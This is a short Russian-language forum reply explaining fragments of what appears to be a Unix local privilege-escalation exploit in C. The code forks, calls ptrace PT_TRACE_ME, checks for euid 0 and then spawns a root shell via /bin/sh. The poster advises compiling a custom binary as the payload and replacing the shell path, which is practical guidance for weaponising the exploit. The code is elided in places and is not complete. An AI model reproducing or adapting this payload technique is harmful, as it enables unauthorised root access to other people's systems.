25.05.2017, 17:25
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
не факт что подскажу тебе правильно
смотри
Код:
#define SH "/bin/sh"
.....
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
....
if ((pid = fork()) == -1)
err(4, "fork");
if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, "ptraceme");
return 0;
}
....
процесс форкается, проверяет уид, если 0( root ) то запускает SH ( /bin/sh )
скомпиль свой бинарь со своей начинкой, и замени путь "#define SH "/bin/sh"
|
|
|